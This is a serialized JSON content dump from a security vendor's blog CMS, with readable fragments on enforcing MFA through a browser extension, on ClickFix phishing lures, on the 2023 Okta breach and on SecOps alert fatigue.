app on all tenants of that app, even those free-tier or test tenants that you don’t know about and have no control over.",[],{},{"nodeType":178,"data":71722,"content":71723},{},[71724,71728,71732],{"nodeType":173,"value":71725,"marks":71726,"data":71727},"As a happy side effect, your compliance team will thank you for finally allowing them to attest to where MFA is ",[],{},{"nodeType":173,"value":60069,"marks":71729,"data":71731},[71730],{"type":1646},{},{"nodeType":173,"value":71733,"marks":71734,"data":71735}," enforced — with verified results, visible at the account level in Push’s admin reporting — across your environment.",[],{},{"nodeType":178,"data":71737,"content":71738},{},[71739],{"nodeType":173,"value":71740,"marks":71741,"data":71742},"Here’s a closer look at how it works:",[],{},{"nodeType":178,"data":71744,"content":71745},{},[71746,71750,71754],{"nodeType":173,"value":71747,"marks":71748,"data":71749},"To enable MFA enforcement, use the configuration tile on the ",[],{},{"nodeType":173,"value":18649,"marks":71751,"data":71753},[71752],{"type":370},{},{"nodeType":173,"value":71755,"marks":71756,"data":71757}," page of the Push admin console and select which apps should require MFA registration. The control currently works with ~90 high-value apps, including Postman, Retool, Datadog, Atlassian, Okta, and others.",[],{},{"nodeType":312,"data":71759,"content":71763},{"target":71760},{"sys":71761},{"id":71762,"type":317,"linkType":318},"2sDbYZL4oJDxLMbYErJfIN",[],{"nodeType":178,"data":71765,"content":71766},{},[71767],{"nodeType":173,"value":71768,"marks":71769,"data":71770},"You can then customize the message the employees will see.",[],{},{"nodeType":178,"data":71772,"content":71773},{},[71774],{"nodeType":173,"value":71775,"marks":71776,"data":71777},"On the end-user side, employees will see a banner with your message as soon as they use an app where they lack MFA. ",[],{},{"nodeType":312,"data":71779,"content":71783},{"target":71780},{"sys":71781},{"id":71782,"type":317,"linkType":318},"37aH1maXXkF8DxgjUod5dn",[],{"nodeType":178,"data":71785,"content":71786},{},[71787],{"nodeType":173,"value":71788,"marks":71789,"data":71790},"To complete MFA registration, the user can go directly to the app’s MFA registration page from a link in the banner (Push provides this link automatically, where one exists). The extension will query the user’s MFA status regularly in the background and when MFA registration is completed, the banner will disappear and the Push platform will clear the “No MFA” security finding for that account.",[],{},{"nodeType":312,"data":71792,"content":71796},{"target":71793},{"sys":71794},{"id":71795,"type":317,"linkType":318},"3yb4KjhH3AbvvSnfMbNONr",[],{"nodeType":169,"data":71798,"content":71799},{},[71800],{"nodeType":173,"value":71801,"marks":71802,"data":71803},"Find out more",[],{},{"nodeType":178,"data":71805,"content":71806},{},[71807,71811,71818],{"nodeType":173,"value":71808,"marks":71809,"data":71810},"To test our MFA visibility and control features, ",[],{},{"nodeType":186,"data":71812,"content":71813},{"uri":2886},[71814],{"nodeType":173,"value":71815,"marks":71816,"data":71817},"request a demo",[],{},{"nodeType":173,"value":71819,"marks":71820,"data":71821}," from our team. We look forward to helping you finally turn the challenge of MFA coverage into a simple problem, easily solved.",[],{},"Using Push to enforce MFA on third-party apps in the browser — even where MFA enforcement isn't supported by the app itself.","2025-01-16T00:00:00.000Z",{"items":71825},[71826,71828],{"sys":71827,"name":26137},{"id":26136},{"sys":71829,"name":509},{"id":508},{"items":71831},[71832],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":71833},{"url":2911},{"__typename":1528,"sys":71835,"content":71836,"title":67811,"synopsis":67812,"hashTags":118,"publishedDate":67813,"slug":67814,"tagsCollection":72252,"authorsCollection":72258},{"id":67326},{"json":71837},{"nodeType":165,"data":71838,"content":71839},{},[71840,71846,71852,71855,71861,71888,71898,71918,71924,71927,71933,71939,71945,71950,71956,71982,71987,71993,72009,72014,72020,72025,72028,72034,72063,72069,72108,72114,72119,72125,72131,72134,72140,72146,72152,72168,72173,72179,72185,72191,72196,72202,72207,72210,72216,72222,72228],{"nodeType":178,"data":71841,"content":71842},{},[71843],{"nodeType":173,"value":67335,"marks":71844,"data":71845},[],{},{"nodeType":178,"data":71847,"content":71848},{},[71849],{"nodeType":173,"value":67342,"marks":71850,"data":71851},[],{},{"nodeType":231,"data":71853,"content":71854},{},[],{"nodeType":169,"data":71856,"content":71857},{},[71858],{"nodeType":173,"value":67352,"marks":71859,"data":71860},[],{},{"nodeType":178,"data":71862,"content":71863},{},[71864,71867,71871,71874,71878,71881,71885],{"nodeType":173,"value":67359,"marks":71865,"data":71866},[],{},{"nodeType":173,"value":67363,"marks":71868,"data":71870},[71869],{"type":1646},{},{"nodeType":173,"value":67368,"marks":71872,"data":71873},[],{},{"nodeType":173,"value":67372,"marks":71875,"data":71877},[71876],{"type":370},{},{"nodeType":173,"value":67377,"marks":71879,"data":71880},[],{},{"nodeType":173,"value":67381,"marks":71882,"data":71884},[71883],{"type":370},{},{"nodeType":173,"value":67386,"marks":71886,"data":71887},[],{},{"nodeType":178,"data":71889,"content":71890},{},[71891,71894],{"nodeType":173,"value":67393,"marks":71892,"data":71893},[],{},{"nodeType":173,"value":67397,"marks":71895,"data":71897},[71896],{"type":370},{},{"nodeType":178,"data":71899,"content":71900},{},[71901,71904,71911,71914],{"nodeType":173,"value":67405,"marks":71902,"data":71903},[],{},{"nodeType":186,"data":71905,"content":71906},{"uri":67410},[71907],{"nodeType":173,"value":67413,"marks":71908,"data":71910},[71909],{"type":194},{},{"nodeType":173,"value":67418,"marks":71912,"data":71913},[],{},{"nodeType":173,"value":67422,"marks":71915,"data":71917},[71916],{"type":370},{},{"nodeType":178,"data":71919,"content":71920},{},[71921],{"nodeType":173,"value":67430,"marks":71922,"data":71923},[],{},{"nodeType":231,"data":71925,"content":71926},{},[],{"nodeType":169,"data":71928,"content":71929},{},[71930],{"nodeType":173,"value":67440,"marks":71931,"data":71932},[],{},{"nodeType":178,"data":71934,"content":71935},{},[71936],{"nodeType":173,"value":67447,"marks":71937,"data":71938},[],{},{"nodeType":178,"data":71940,"content":71941},{},[71942],{"nodeType":173,"value":67454,"marks":71943,"data":71944},[],{},{"nodeType":312,"data":71946,"content":71949},{"target":71947},{"sys":71948},{"id":67461,"type":317,"linkType":318},[],{"nodeType":235,"data":71951,"content":71952},{},[71953],{"nodeType":173,"value":67467,"marks":71954,"data":71955},[],{},{"nodeType":178,"data":71957,"content":71958},{},[71959,71962,71969,71972,71979],{"nodeType":173,"value":67474,"marks":71960,"data":71961},[],{},{"nodeType":186,"data":71963,"content":71964},{"uri":819},[71965],{"nodeType":173,"value":27706,"marks":71966,"data":71968},[71967],{"type":194},{},{"nodeType":173,"value":67485,"marks":71970,"data":71971},[],{},{"nodeType":186,"data":71973,"content":71974},{"uri":598},[71975],{"nodeType":173,"value":67492,"marks":71976,"data":71978},[71977],{"type":194},{},{"nodeType":173,"value":67497,"marks":71980,"data":71981},[],{},{"nodeType":312,"data":71983,"content":71986},{"target":71984},{"sys":71985},{"id":67504,"type":317,"linkType":318},[],{"nodeType":178,"data":71988,"content":71989},{},[71990],{"nodeType":173,"value":67510,"marks":71991,"data":71992},[],{},{"nodeType":178,"data":71994,"content":71995},{},[71996,71999,72006],{"nodeType":173,"value":67517,"marks":71997,"data":71998},[],{},{"nodeType":186,"data":72000,"content":72001},{"uri":67522},[72002],{"nodeType":173,"value":67525,"marks":72003,"data":72005},[72004],{"type":194},{},{"nodeType":173,"value":67530,"marks":72007,"data":72008},[],{},{"nodeType":312,"data":72010,"content":72013},{"target":72011},{"sys":72012},{"id":67537,"type":317,"linkType":318},[],{"nodeType":178,"data":72015,"content":72016},{},[72017],{"nodeType":173,"value":67543,"marks":72018,"data":72019},[],{},{"nodeType":312,"data":72021,"content":72024},{"target":72022},{"sys":72023},{"id":67550,"type":317,"linkType":318},[],{"nodeType":231,"data":72026,"content":72027},{},[],{"nodeType":169,"data":72029,"content":72030},{},[72031],{"nodeType":173,"value":67559,"marks":72032,"data":72033},[],{},{"nodeType":178,"data":72035,"content":72036},{},[72037,72040,72046,72049,72053,72056,72060],{"nodeType":173,"value":67566,"marks":72038,"data":72039},[],{},{"nodeType":186,"data":72041,"content":72042},{"uri":188},[72043],{"nodeType":173,"value":67573,"marks":72044,"data":72045},[],{},{"nodeType":173,"value":67577,"marks":72047,"data":72048},[],{},{"nodeType":173,"value":67581,"marks":72050,"data":72052},[72051],{"type":370},{},{"nodeType":173,"value":67586,"marks":72054,"data":72055},[],{},{"nodeType":173,"value":67590,"marks":72057,"data":72059},[72058],{"type":370},{},{"nodeType":173,"value":67595,"marks":72061,"data":72062},[],{},{"nodeType":178,"data":72064,"content":72065},{},[72066],{"nodeType":173,"value":67602,"marks":72067,"data":72068},[],{},{"nodeType":250,"data":72070,"content":72071},{},[72072,72081,72090,72099],{"nodeType":254,"data":72073,"content":72074},{},[72075],{"nodeType":178,"data":72076,"content":72077},{},[72078],{"nodeType":173,"value":67615,"marks":72079,"data":72080},[],{},{"nodeType":254,"data":72082,"content":72083},{},[72084],{"nodeType":178,"data":72085,"content":72086},{},[72087],{"nodeType":173,"value":67625,"marks":72088,"data":72089},[],{},{"nodeType":254,"data":72091,"content":72092},{},[72093],{"nodeType":178,"data":72094,"content":72095},{},[72096],{"nodeType":173,"value":67635,"marks":72097,"data":72098},[],{},{"nodeType":254,"data":72100,"content":72101},{},[72102],{"nodeType":178,"data":72103,"content":72104},{},[72105],{"nodeType":173,"value":67645,"marks":72106,"data":72107},[],{},{"nodeType":178,"data":72109,"content":72110},{},[72111],{"nodeType":173,"value":67652,"marks":72112,"data":72113},[],{},{"nodeType":312,"data":72115,"content":72118},{"target":72116},{"sys":72117},{"id":67659,"type":317,"linkType":318},[],{"nodeType":178,"data":72120,"content":72121},{},[72122],{"nodeType":173,"value":67665,"marks":72123,"data":72124},[],{},{"nodeType":178,"data":72126,"content":72127},{},[72128],{"nodeType":173,"value":67672,"marks":72129,"data":72130},[],{},{"nodeType":231,"data":72132,"content":72133},{},[],{"nodeType":169,"data":72135,"content":72136},{},[72137],{"nodeType":173,"value":67682,"marks":72138,"data":72139},[],{},{"nodeType":178,"data":72141,"content":72142},{},[72143],{"nodeType":173,"value":67689,"marks":72144,"data":72145},[],{},{"nodeType":178,"data":72147,"content":72148},{},[72149],{"nodeType":173,"value":67696,"marks":72150,"data":72151},[],{},{"nodeType":178,"data":72153,"content":72154},{},[72155,72158,72165],{"nodeType":173,"value":67703,"marks":72156,"data":72157},[],{},{"nodeType":186,"data":72159,"content":72160},{"uri":9120},[72161],{"nodeType":173,"value":67710,"marks":72162,"data":72164},[72163],{"type":194},{},{"nodeType":173,"value":67715,"marks":72166,"data":72167},[],{},{"nodeType":312,"data":72169,"content":72172},{"target":72170},{"sys":72171},{"id":67722,"type":317,"linkType":318},[],{"nodeType":235,"data":72174,"content":72175},{},[72176],{"nodeType":173,"value":67728,"marks":72177,"data":72178},[],{},{"nodeType":178,"data":72180,"content":72181},{},[72182],{"nodeType":173,"value":67735,"marks":72183,"data":72184},[],{},{"nodeType":178,"data":72186,"content":72187},{},[72188],{"nodeType":173,"value":67742,"marks":72189,"data":72190},[],{},{"nodeType":312,"data":72192,"content":72195},{"target":72193},{"sys":72194},{"id":67749,"type":317,"linkType":318},[],{"nodeType":178,"data":72197,"content":72198},{},[72199],{"nodeType":173,"value":67755,"marks":72200,"data":72201},[],{},{"nodeType":312,"data":72203,"content":72206},{"target":72204},{"sys":72205},{"id":67762,"type":317,"linkType":318},[],{"nodeType":231,"data":72208,"content":72209},{},[],{"nodeType":169,"data":72211,"content":72212},{},[72213],{"nodeType":173,"value":20431,"marks":72214,"data":72215},[],{},{"nodeType":178,"data":72217,"content":72218},{},[72219],{"nodeType":173,"value":67777,"marks":72220,"data":72221},[],{},{"nodeType":178,"data":72223,"content":72224},{},[72225],{"nodeType":173,"value":67784,"marks":72226,"data":72227},[],{},{"nodeType":178,"data":72229,"content":72230},{},[72231,72234,72240,72243,72249],{"nodeType":173,"value":1451,"marks":72232,"data":72233},[],{},{"nodeType":186,"data":72235,"content":72236},{"uri":1456},[72237],{"nodeType":173,"value":1459,"marks":72238,"data":72239},[],{},{"nodeType":173,"value":1464,"marks":72241,"data":72242},[],{},{"nodeType":186,"data":72244,"content":72245},{"uri":1469},[72246],{"nodeType":173,"value":1472,"marks":72247,"data":72248},[],{},{"nodeType":173,"value":1477,"marks":72250,"data":72251},[],{},{"items":72253},[72254,72256],{"sys":72255,"name":509},{"id":508},{"sys":72257,"name":505},{"id":504},{"items":72259},[72260],{"fullName":26724,"firstName":26725,"jobTitle":26726,"profilePicture":72261},{"url":26728},{"items":72263},[72264],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":72265},{"url":1496},{"json":72267,"links":72801},{"nodeType":165,"data":72268,"content":72269},{},[72270,72306,72352,72365,72370,72376,72379,72386,72392,72398,72404,72420,72426,72431,72446,72451,72454,72461,72467,72474,72490,72496,72502,72508,72515,72521,72527,72532,72538,72568,72573,72580,72596,72602,72623,72629,72635,72640,72646,72649,72656,72669,72685,72691,72697,72703,72708,72715,72730,72733,72740,72746,72752,72758,72764,72790,72795],{"nodeType":178,"data":72271,"content":72272},{},[72273,72276,72283,72286,72293,72296,72303],{"nodeType":173,"value":21114,"marks":72274,"data":72275},[],{},{"nodeType":186,"data":72277,"content":72278},{"uri":21119},[72279],{"nodeType":173,"value":1845,"marks":72280,"data":72282},[72281],{"type":194},{},{"nodeType":173,"value":21126,"marks":72284,"data":72285},[],{},{"nodeType":186,"data":72287,"content":72288},{"uri":21131},[72289],{"nodeType":173,"value":21134,"marks":72290,"data":72292},[72291],{"type":194},{},{"nodeType":173,"value":21139,"marks":72294,"data":72295},[],{},{"nodeType":186,"data":72297,"content":72298},{"uri":21144},[72299],{"nodeType":173,"value":21147,"marks":72300,"data":72302},[72301],{"type":194},{},{"nodeType":173,"value":21152,"marks":72304,"data":72305},[],{},{"nodeType":178,"data":72307,"content":72308},{},[72309,72312,72319,72322,72329,72332,72339,72342,72349],{"nodeType":173,"value":21159,"marks":72310,"data":72311},[],{},{"nodeType":186,"data":72313,"content":72314},{"uri":21164},[72315],{"nodeType":173,"value":21167,"marks":72316,"data":72318},[72317],{"type":194},{},{"nodeType":173,"value":2936,"marks":72320,"data":72321},[],{},{"nodeType":186,"data":72323,"content":72324},{"uri":21176},[72325],{"nodeType":173,"value":21179,"marks":72326,"data":72328},[72327],{"type":194},{},{"nodeType":173,"value":2936,"marks":72330,"data":72331},[],{},{"nodeType":186,"data":72333,"content":72334},{"uri":21188},[72335],{"nodeType":173,"value":21191,"marks":72336,"data":72338},[72337],{"type":194},{},{"nodeType":173,"value":21196,"marks":72340,"data":72341},[],{},{"nodeType":186,"data":72343,"content":72344},{"uri":21201},[72345],{"nodeType":173,"value":21204,"marks":72346,"data":72348},[72347],{"type":194},{},{"nodeType":173,"value":21209,"marks":72350,"data":72351},[],{},{"nodeType":178,"data":72353,"content":72354},{},[72355,72358,72362],{"nodeType":173,"value":21216,"marks":72356,"data":72357},[],{},{"nodeType":173,"value":20995,"marks":72359,"data":72361},[72360],{"type":370},{},{"nodeType":173,"value":21224,"marks":72363,"data":72364},[],{},{"nodeType":312,"data":72366,"content":72369},{"target":72367},{"sys":72368},{"id":21021,"type":317,"linkType":318},[],{"nodeType":178,"data":72371,"content":72372},{},[72373],{"nodeType":173,"value":21236,"marks":72374,"data":72375},[],{},{"nodeType":231,"data":72377,"content":72378},{},[],{"nodeType":169,"data":72380,"content":72381},{},[72382],{"nodeType":173,"value":21246,"marks":72383,"data":72385},[72384],{"type":370},{},{"nodeType":178,"data":72387,"content":72388},{},[72389],{"nodeType":173,"value":21254,"marks":72390,"data":72391},[],{},{"nodeType":178,"data":72393,"content":72394},{},[72395],{"nodeType":173,"value":21261,"marks":72396,"data":72397},[],{},{"nodeType":178,"data":72399,"content":72400},{},[72401],{"nodeType":173,"value":21268,"marks":72402,"data":72403},[],{},{"nodeType":178,"data":72405,"content":72406},{},[72407,72410,72417],{"nodeType":173,"value":21275,"marks":72408,"data":72409},[],{},{"nodeType":186,"data":72411,"content":72412},{"uri":21280},[72413],{"nodeType":173,"value":21283,"marks":72414,"data":72416},[72415],{"type":194},{},{"nodeType":173,"value":21288,"marks":72418,"data":72419},[],{},{"nodeType":178,"data":72421,"content":72422},{},[72423],{"nodeType":173,"value":21295,"marks":72424,"data":72425},[],{},{"nodeType":312,"data":72427,"content":72430},{"target":72428},{"sys":72429},{"id":21302,"type":317,"linkType":318},[],{"nodeType":178,"data":72432,"content":72433},{},[72434,72437,72443],{"nodeType":173,"value":21308,"marks":72435,"data":72436},[],{},{"nodeType":186,"data":72438,"content":72439},{"uri":20775},[72440],{"nodeType":173,"value":21315,"marks":72441,"data":72442},[],{},{"nodeType":173,"value":21319,"marks":72444,"data":72445},[],{},{"nodeType":312,"data":72447,"content":72450},{"target":72448},{"sys":72449},{"id":21326,"type":317,"linkType":318},[],{"nodeType":231,"data":72452,"content":72453},{},[],{"nodeType":169,"data":72455,"content":72456},{},[72457],{"nodeType":173,"value":21335,"marks":72458,"data":72460},[72459],{"type":370},{},{"nodeType":178,"data":72462,"content":72463},{},[72464],{"nodeType":173,"value":21343,"marks":72465,"data":72466},[],{},{"nodeType":235,"data":72468,"content":72469},{},[72470],{"nodeType":173,"value":21350,"marks":72471,"data":72473},[72472],{"type":370},{},{"nodeType":178,"data":72475,"content":72476},{},[72477,72480,72487],{"nodeType":173,"value":21358,"marks":72478,"data":72479},[],{},{"nodeType":186,"data":72481,"content":72482},{"uri":8987},[72483],{"nodeType":173,"value":21365,"marks":72484,"data":72486},[72485],{"type":194},{},{"nodeType":173,"value":21370,"marks":72488,"data":72489},[],{},{"nodeType":178,"data":72491,"content":72492},{},[72493],{"nodeType":173,"value":21377,"marks":72494,"data":72495},[],{},{"nodeType":178,"data":72497,"content":72498},{},[72499],{"nodeType":173,"value":21384,"marks":72500,"data":72501},[],{},{"nodeType":178,"data":72503,"content":72504},{},[72505],{"nodeType":173,"value":21391,"marks":72506,"data":72507},[],{},{"nodeType":235,"data":72509,"content":72510},{},[72511],{"nodeType":173,"value":21398,"marks":72512,"data":72514},[72513],{"type":370},{},{"nodeType":178,"data":72516,"content":72517},{},[72518],{"nodeType":173,"value":21406,"marks":72519,"data":72520},[],{},{"nodeType":178,"data":72522,"content":72523},{},[72524],{"nodeType":173,"value":21413,"marks":72525,"data":72526},[],{},{"nodeType":312,"data":72528,"content":72531},{"target":72529},{"sys":72530},{"id":21420,"type":317,"linkType":318},[],{"nodeType":178,"data":72533,"content":72534},{},[72535],{"nodeType":173,"value":21426,"marks":72536,"data":72537},[],{},{"nodeType":250,"data":72539,"content":72540},{},[72541,72550,72559],{"nodeType":254,"data":72542,"content":72543},{},[72544],{"nodeType":178,"data":72545,"content":72546},{},[72547],{"nodeType":173,"value":21439,"marks":72548,"data":72549},[],{},{"nodeType":254,"data":72551,"content":72552},{},[72553],{"nodeType":178,"data":72554,"content":72555},{},[72556],{"nodeType":173,"value":21449,"marks":72557,"data":72558},[],{},{"nodeType":254,"data":72560,"content":72561},{},[72562],{"nodeType":178,"data":72563,"content":72564},{},[72565],{"nodeType":173,"value":21459,"marks":72566,"data":72567},[],{},{"nodeType":312,"data":72569,"content":72572},{"target":72570},{"sys":72571},{"id":21466,"type":317,"linkType":318},[],{"nodeType":235,"data":72574,"content":72575},{},[72576],{"nodeType":173,"value":21472,"marks":72577,"data":72579},[72578],{"type":370},{},{"nodeType":178,"data":72581,"content":72582},{},[72583,72586,72593],{"nodeType":173,"value":21480,"marks":72584,"data":72585},[],{},{"nodeType":186,"data":72587,"content":72588},{"uri":21119},[72589],{"nodeType":173,"value":21487,"marks":72590,"data":72592},[72591],{"type":194},{},{"nodeType":173,"value":21492,"marks":72594,"data":72595},[],{},{"nodeType":178,"data":72597,"content":72598},{},[72599],{"nodeType":173,"value":21499,"marks":72600,"data":72601},[],{},{"nodeType":250,"data":72603,"content":72604},{},[72605,72614],{"nodeType":254,"data":72606,"content":72607},{},[72608],{"nodeType":178,"data":72609,"content":72610},{},[72611],{"nodeType":173,"value":21512,"marks":72612,"data":72613},[],{},{"nodeType":254,"data":72615,"content":72616},{},[72617],{"nodeType":178,"data":72618,"content":72619},{},[72620],{"nodeType":173,"value":21522,"marks":72621,"data":72622},[],{},{"nodeType":178,"data":72624,"content":72625},{},[72626],{"nodeType":173,"value":21529,"marks":72627,"data":72628},[],{},{"nodeType":178,"data":72630,"content":72631},{},[72632],{"nodeType":173,"value":21536,"marks":72633,"data":72634},[],{},{"nodeType":312,"data":72636,"content":72639},{"target":72637},{"sys":72638},{"id":21543,"type":317,"linkType":318},[],{"nodeType":178,"data":72641,"content":72642},{},[72643],{"nodeType":173,"value":21549,"marks":72644,"data":72645},[],{},{"nodeType":231,"data":72647,"content":72648},{},[],{"nodeType":169,"data":72650,"content":72651},{},[72652],{"nodeType":173,"value":21559,"marks":72653,"data":72655},[72654],{"type":370},{},{"nodeType":178,"data":72657,"content":72658},{},[72659,72662,72666],{"nodeType":173,"value":21216,"marks":72660,"data":72661},[],{},{"nodeType":173,"value":20995,"marks":72663,"data":72665},[72664],{"type":370},{},{"nodeType":173,"value":21574,"marks":72667,"data":72668},[],{},{"nodeType":178,"data":72670,"content":72671},{},[72672,72675,72682],{"nodeType":173,"value":21581,"marks":72673,"data":72674},[],{},{"nodeType":186,"data":72676,"content":72677},{"uri":9099},[72678],{"nodeType":173,"value":21588,"marks":72679,"data":72681},[72680],{"type":194},{},{"nodeType":173,"value":21593,"marks":72683,"data":72684},[],{},{"nodeType":178,"data":72686,"content":72687},{},[72688],{"nodeType":173,"value":21600,"marks":72689,"data":72690},[],{},{"nodeType":178,"data":72692,"content":72693},{},[72694],{"nodeType":173,"value":21607,"marks":72695,"data":72696},[],{},{"nodeType":178,"data":72698,"content":72699},{},[72700],{"nodeType":173,"value":21614,"marks":72701,"data":72702},[],{},{"nodeType":312,"data":72704,"content":72707},{"target":72705},{"sys":72706},{"id":21021,"type":317,"linkType":318},[],{"nodeType":235,"data":72709,"content":72710},{},[72711],{"nodeType":173,"value":21626,"marks":72712,"data":72714},[72713],{"type":370},{},{"nodeType":178,"data":72716,"content":72717},{},[72718,72721,72727],{"nodeType":173,"value":21634,"marks":72719,"data":72720},[],{},{"nodeType":186,"data":72722,"content":72723},{"uri":21639},[72724],{"nodeType":173,"value":21642,"marks":72725,"data":72726},[],{},{"nodeType":173,"value":21646,"marks":72728,"data":72729},[],{},{"nodeType":231,"data":72731,"content":72732},{},[],{"nodeType":169,"data":72734,"content":72735},{},[72736],{"nodeType":173,"value":2824,"marks":72737,"data":72739},[72738],{"type":370},{},{"nodeType":178,"data":72741,"content":72742},{},[72743],{"nodeType":173,"value":21663,"marks":72744,"data":72745},[],{},{"nodeType":178,"data":72747,"content":72748},{},[72749],{"nodeType":173,"value":21670,"marks":72750,"data":72751},[],{},{"nodeType":178,"data":72753,"content":72754},{},[72755],{"nodeType":173,"value":21677,"marks":72756,"data":72757},[],{},{"nodeType":178,"data":72759,"content":72760},{},[72761],{"nodeType":173,"value":21684,"marks":72762,"data":72763},[],{},{"nodeType":178,"data":72765,"content":72766},{},[72767,72770,72777,72780,72787],{"nodeType":173,"value":1451,"marks":72768,"data":72769},[],{},{"nodeType":186,"data":72771,"content":72772},{"uri":1456},[72773],{"nodeType":173,"value":1459,"marks":72774,"data":72776},[72775],{"type":194},{},{"nodeType":173,"value":1464,"marks":72778,"data":72779},[],{},{"nodeType":186,"data":72781,"content":72782},{"uri":1469},[72783],{"nodeType":173,"value":1472,"marks":72784,"data":72786},[72785],{"type":194},{},{"nodeType":173,"value":1477,"marks":72788,"data":72789},[],{},{"nodeType":312,"data":72791,"content":72794},{"target":72792},{"sys":72793},{"id":21466,"type":317,"linkType":318},[],{"nodeType":178,"data":72796,"content":72797},{},[72798],{"nodeType":173,"value":37,"marks":72799,"data":72800},[],{},{"entries":72802},{"hyperlink":72803,"inline":72804,"block":72805},[],[],[72806,72808,72812,72818,72844,72848],{"sys":72807,"__typename":5434,"title":46386,"arcadeDemoUrl":46387,"playText":5437},{"id":21021},{"sys":72809,"__typename":5345,"title":72810,"caption":72810,"layoutMode":118,"file":72811},{"id":21302},"Phishing delivery channels have significantly expanded from the days of email-based phishing attacks",{"url":65003,"width":65004,"height":65005},{"sys":72813,"__typename":5345,"title":72814,"caption":72814,"layoutMode":118,"file":72815},{"id":21326},"Examples of ClickFix lures used by attackers in the wild.",{"url":72816,"width":5358,"height":72817},"https://images.ctfassets.net/y1cdw1ablpvd/7AH10e5YpESPdIBIH4YjHO/e7d5553657b6b0f20d6ed563d69af1e4/image3.png",1955,{"sys":72819,"__typename":5311,"content":72820,"name":72843,"title":118},{"id":21420},{"json":72821},{"nodeType":165,"data":72822,"content":72823},{},[72824],{"nodeType":178,"data":72825,"content":72826},{},[72827,72831,72840],{"nodeType":173,"value":72828,"marks":72829,"data":72830},"Attacks on BYOD or personal devices are increasingly leading to corporate breaches where email accounts are being used to sign into corporate browser profiles. This results in corporate credentials inadvertently saved and synced across devices being exposed in the breach (the most well-known example of this being in ",[],{},{"nodeType":186,"data":72832,"content":72834},{"uri":72833},"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause/?utm_source=chatgpt.com",[72835],{"nodeType":173,"value":72836,"marks":72837,"data":72839},"Okta’s 2023 support case management system breach",[72838],{"type":194},{},{"nodeType":173,"value":53584,"marks":72841,"data":72842},[],{},"clickfix insight box 1",{"sys":72845,"__typename":15269,"type":15270,"ctaText":72846,"buttonLabel":15277,"buttonColour":72847,"buttonUrl":7986},{"id":21466},"Register for our webinar to learn more about the latest developments in ClickFix attacks and why they're so effective.","sea blue",{"sys":72849,"__typename":5345,"title":72850,"caption":72850,"layoutMode":118,"file":72851},{"id":21543},"ClickFix builder screenshots. Source: Microsoft",{"url":72852,"width":5358,"height":72853},"https://images.ctfassets.net/y1cdw1ablpvd/2adTEIfv1YmEkXzzKA5UFC/47fd4025b72923dd0a1a16eb736e8980/image2.png",540,"content:blog:introducing-malicious-copy-paste-detection.json","blog/introducing-malicious-copy-paste-detection.json","blog/introducing-malicious-copy-paste-detection",{"_path":72858,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":72859,"ogImage":118,"summary":72861,"title":67811,"subtitle":118,"metaTitle":67811,"synopsis":67812,"hashTags":118,"publishedDate":67813,"slug":67814,"tagsCollection":72872,"relatedBlogPostsCollection":72878,"authorsCollection":75158,"content":75162,"_id":75686,"_type":5439,"_source":5440,"_file":75687,"_stem":75688,"_extension":5439},"/blog/fixing-secops-alert-fatigue-with-browser-telemetry",{"id":67326,"publishedAt":72860},"2025-11-18T10:17:09.351Z",{"json":72862},{"data":72863,"content":72864,"nodeType":165},{},[72865],{"data":72866,"content":72867,"nodeType":178},{},[72868],{"data":72869,"marks":72870,"value":72871,"nodeType":173},{},[],"The alert fatigue epidemic has reached crisis proportions, fueled by an expanding attack surface and telemetry gaps. But it's not all doom and gloom: the browser presents security teams with a net-new data source that is objectively better at detecting early-stage indicators of attack. Here's what you need to know. ",{"items":72873},[72874,72876],{"sys":72875,"name":509},{"id":508},{"sys":72877,"name":505},{"id":504},{"items":72879},[72880,73708,74491],{"__typename":1528,"sys":72881,"content":72882,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":73698,"authorsCollection":73704},{"id":519},{"json":72883},{"nodeType":165,"data":72884,"content":72885},{},[72886,72892,72898,72904,72907,72914,72920,72926,72931,72937,72942,72958,72964,72974,72977,72984,72990,73003,73009,73019,73024,73027,73034,73041,73046,73054,73070,73078,73084,73092,73107,73115,73121,73129,73155,73163,73169,73177,73193,73198,73206,73212,73220,73253,73256,73263,73271,73287,73295,73301,73309,73335,73340,73348,73354,73359,73362,73369,73377,73383,73434,73439,73442,73449,73457,73463,73468,73471,73478,73484,73490,73550,73556,73611,73617,73620,73627,73633,73639,73644,73647,73654,73660,73666,73672],{"nodeType":178,"data":72887,"content":72888},{},[72889],{"nodeType":173,"value":528,"marks":72890,"data":72891},[],{},{"nodeType":178,"data":72893,"content":72894},{},[72895],{"nodeType":173,"value":535,"marks":72896,"data":72897},[],{},{"nodeType":178,"data":72899,"content":72900},{},[72901],{"nodeType":173,"value":542,"marks":72902,"data":72903},[],{},{"nodeType":231,"data":72905,"content":72906},{},[],{"nodeType":169,"data":72908,"content":72909},{},[72910],{"nodeType":173,"value":552,"marks":72911,"data":72913},[72912],{"type":370},{},{"nodeType":178,"data":72915,"content":72916},{},[72917],{"nodeType":173,"value":560,"marks":72918,"data":72919},[],{},{"nodeType":178,"data":72921,"content":72922},{},[72923],{"nodeType":173,"value":567,"marks":72924,"data":72925},[],{},{"nodeType":312,"data":72927,"content":72930},{"target":72928},{"sys":72929},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":72932,"content":72933},{},[72934],{"nodeType":173,"value":580,"marks":72935,"data":72936},[],{},{"nodeType":312,"data":72938,"content":72941},{"target":72939},{"sys":72940},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":72943,"content":72944},{},[72945,72948,72955],{"nodeType":173,"value":593,"marks":72946,"data":72947},[],{},{"nodeType":186,"data":72949,"content":72950},{"uri":598},[72951],{"nodeType":173,"value":601,"marks":72952,"data":72954},[72953],{"type":194},{},{"nodeType":173,"value":606,"marks":72956,"data":72957},[],{},{"nodeType":178,"data":72959,"content":72960},{},[72961],{"nodeType":173,"value":613,"marks":72962,"data":72963},[],{},{"nodeType":178,"data":72965,"content":72966},{},[72967,72970],{"nodeType":173,"value":620,"marks":72968,"data":72969},[],{},{"nodeType":173,"value":624,"marks":72971,"data":72973},[72972],{"type":370},{},{"nodeType":231,"data":72975,"content":72976},{},[],{"nodeType":169,"data":72978,"content":72979},{},[72980],{"nodeType":173,"value":635,"marks":72981,"data":72983},[72982],{"type":370},{},{"nodeType":178,"data":72985,"content":72986},{},[72987],{"nodeType":173,"value":643,"marks":72988,"data":72989},[],{},{"n